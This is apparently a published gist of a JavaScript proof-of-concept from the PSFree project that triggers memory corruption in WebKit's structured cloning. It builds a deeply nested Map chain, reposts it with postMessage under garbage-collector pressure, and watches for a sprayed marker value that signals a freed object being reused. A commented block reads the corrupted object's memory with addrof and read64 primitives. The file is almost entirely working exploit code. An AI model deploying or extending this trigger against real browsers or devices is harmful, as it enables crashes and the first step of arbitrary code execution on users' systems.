
@ntfargo
Last active May 26, 2025 22:09
thanks to abc
/* Copyright (C) 2024 anonymous
This file is part of PSFree.
PSFree is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
PSFree is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
// see commit c9880de4a28b at WebKit@main (git)
//import { mem } from '/module/mem.mjs';
import { debug_log } from '/module/utils.mjs';
/**
 * Returns a promise that settles after a timer fires.
 *
 * @param {number} [ms=0] - Delay handed to setTimeout, in milliseconds.
 * @returns {Promise<void>} Resolves with no value once the timer callback runs.
 */
export function sleep(ms=0) {
  return new Promise((done) => {
    // With the default of 0 this still yields to the event loop for one timer turn.
    setTimeout(done, ms);
  });
}
/**
 * Allocates a 4 MiB typed array and discards it at once.
 *
 * The code only performs the allocation; judging by the name it is presumably
 * meant to put pressure on the engine's garbage collector. Nothing here
 * guarantees that a collection actually runs.
 *
 * @returns {void}
 */
function gc() {
  const pressureBytes = 4 * 1024 * 1024;
  // Deliberately not stored: the buffer is unreachable as soon as it is created.
  new Uint8Array(pressureBytes);
}
/**
 * Creates 1024 Date objects, each with timestamp 0xbeef, in a local array that
 * is dropped when the function returns.
 *
 * NOTE(review): nothing in this listing calls spray(); it looks like a leftover
 * helper. Confirm before relying on it.
 *
 * @returns {void}
 */
function spray() {
  const held = [];
  let remaining = 1024;
  while (remaining-- > 0) {
    held.push(new Date(0xbeef));
  }
}
// Entry point: an async function expression that is invoked immediately when the
// module is evaluated. It builds a deeply nested Map graph, repeatedly sends it to
// this same context with postMessage(), and inspects the copy delivered by the
// 'message' event for keys that differ from what was sent.
//
// NOTE(review): the loop below only exits when the received copy looks wrong or
// when walking it throws. On an engine that returns a faithful copy it runs
// forever, so the page appearing to hang is the expected result there.
void async function main() {
// Nesting depth of the Map chain.
const num_elems = 1600; // increased from 800
let root = new Map();
let msg = root;
// 100 Date objects that all carry the marker timestamp 0xffff. The same array is
// referenced from the value of every level in the chain.
let foo = [];
for (let i = 0; i < 100; i++) {
foo.push(new Date(0xffff));
}
// Build the chain: each Map holds exactly one entry, keyed by Date(i), whose value
// is [next Map in the chain, foo].
for (let i = 0; i < num_elems; i++) {
const d = new Date(i);
const map = new Map();
msg.set(d, [map, foo]);
msg = map;
}
// Rewind to the head of the chain; this is the object that gets posted.
msg = root;
// data2: the suspect key captured when walking the copy throws (stays null otherwise).
// idx: chain level at which the anomaly was seen. It is written below but never
// read afterwards in this listing.
let data2 = null;
let idx = null;
loop: while (true) {
let data = null;
// Register a one-shot 'message' listener before posting so the event cannot be missed.
const prom = new Promise(resolve => {
addEventListener('message', event => {
data = event;
resolve();
}, {once: true});
});
// `origin` is not declared in this file; presumably the global self.origin, which
// makes this a message to the current context itself.
postMessage(msg, origin);
await prom;
// Unwrap the MessageEvent: from here on `data` is the received copy of the chain head.
data = data.data;
// Allocate-and-drop, then yield one timer turn, before the copy is inspected.
gc();
await sleep();
// Tracks the level being inspected so the catch block can report it.
let tmp_i = null;
try {
for (let i = 0; i < num_elems; i++) {
tmp_i = i;
// The keys that were sent are Date(0) .. Date(num_elems - 1), so a faithful copy
// can never report 0xffff here. A match means the key read back carries the
// timestamp that was only given to the elements of `foo`.
if (data.keys().next().value.getTime() === 0xffff) {
idx = i;
break loop;
}
// Descend to the next Map, stored at index 0 of this level's value.
data = data.values().next().value[0];
}
} catch {
// Any exception while walking the copy is treated as an anomaly as well.
idx = tmp_i;
// NOTE(review): this re-reads the first key outside the try block. If the key
// access itself was what threw, it would throw again here and reject main().
data2 = data.keys().next().value;
break loop;
}
}
// NOTE(review): the block below needs `mem`, whose import is commented out at the
// top of this file, so it cannot run as published.
// comment this out if you just want to crash
// import mem if you want to read the corrupted object
/*
debug_log('normal Date:');
const tmp_d = new Date();
const date_p = mem.addrof(tmp_d);
for (let i = 0; i < 8*8; i += 8) {
debug_log(date_p.read64(i));
}
debug_log('corrupted:');
const data_p = mem.addrof(data2);
for (let i = 0; i < 8*8; i += 8) {
debug_log(data_p.read64(i));
}
*/
// alert() blocks until dismissed; only then is the captured object passed to
// debug_log. When the loop exited via the timestamp match, data2 is still null.
alert('try crash');
debug_log(data2);
}();